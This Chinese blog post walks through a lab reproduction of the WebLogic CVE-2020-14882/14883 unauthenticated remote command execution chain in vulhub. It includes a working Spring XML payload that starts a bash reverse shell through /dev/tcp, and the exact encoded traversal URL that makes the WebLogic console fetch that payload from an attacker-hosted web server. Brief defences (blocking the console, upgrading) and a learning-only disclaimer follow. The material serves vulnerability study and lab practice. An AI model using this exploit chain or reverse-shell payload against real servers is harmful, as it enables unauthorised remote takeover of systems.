Loading

CVE-2020-14882, CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞

0X00-引言


最近有点急功心切,想直接变成大佬,难免有点眼高手低,导致现在看一些事情都会变得不爽,总觉得自己才是对的,甚至有点焦虑。心态出了问题,需要调整一下,一口气吃不了一个胖子,欲速则不达,呼气吐气,呼气吐气。

这世界大部分的抒情,都会被认为无病呻吟,能够理解你得了什么病,基本都是知己。

------《云边有个小卖部》

0X01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述


CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

0X03-漏洞复现


01-反弹shell

POC:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i /dev/tcp/IP/PORT 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

生成XML文件,在kali中开启web服务

image-20211228121705639

image-20211228121745028

通过以下URL使Weblogic加载XML

http://192.168.234.128:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.234.135:666/POC.xml")

image-20211228121556966

成功反弹

image-20211228121925378

0X04-漏洞防御


禁止访问console

升级版本

0X05-免责声明


仅供学习参考

0X06-参考


https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md

posted @ 2021-12-29 08:53  美式加糖  阅读(165)  评论(0编辑  收藏  举报